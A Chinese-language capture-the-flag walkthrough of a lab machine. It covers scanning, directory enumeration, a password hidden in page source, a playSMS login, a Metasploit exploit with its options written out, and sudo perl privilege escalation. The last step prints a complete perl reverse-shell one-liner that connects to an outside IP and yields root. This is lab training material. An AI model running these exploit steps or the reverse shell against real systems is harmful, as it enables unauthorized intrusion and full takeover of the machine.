一、导入好靶机之后,先修改网卡配置为net,利用kali进行同一网段扫描
得到靶机IP地址
同时进行端口服务版本扫描
二、已知80端口开启,访问靶机IP
对靶机IP进行目录扫描,同时拼接robots.txt,查看是否有敏感接口
通过拼接访问,发现拼接rotbots.txt有敏感接口
拼接secure目录,发现有个压缩文件,话不多说,先下载下来瞅瞅
尝试解压,发现需要密码才可以,继续寻找信息点
通过努力查找,终于发现在拼接/nothing的时候,不是一个404页面,查看源代码发现密码信息
(松了一口气),尝试用这些密码解压backup.zip文件,发现freedom可以
解压完之后是个音频文件,而且还损坏了,试着用记事本打开
发现了一个url和用户,还有一个不可看的密码
三、拼接访问,得到一个登录页面
经过分析,username肯定就是touhid,密码尝试用源代码的密码
账户:touhid,密码:diana
登录成功后,发现页面啥也没有,但是表示了是playSMS框架
四、利用工具msfconsole
1.搜索对应框架漏洞 search playSMS
2.尝试过后,序号2可以成功利用 use 2,show options 查看需要配置的项
set targeturi /SecreTSMSgatwayLogin (配置上传文件页面的url)
set password diana (配置密码)
set username touhid (配置账户)
set rhosts 192.168.234.131(靶机ip)
set lhost 192.168.234.128(kali监听机的ip)
set LPORT 1234(kali监听的端口)
成功反弹上shell
五、提权
python -c 'import pty; pty.spawn("/bin/bash")' (获取交互式shell格式)
1.使用sudo -l命令查看可提权文件,发现可以执行perl命令,(所有用户均可以执行)
2.通过perl写入反向shell语句
sudo perl -e 'use Socket;$i="47.99.195.123";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
3.攻击者监听,成功反弹到shell
并且是root权限,提权成功
靶机到此结束,感谢大家观看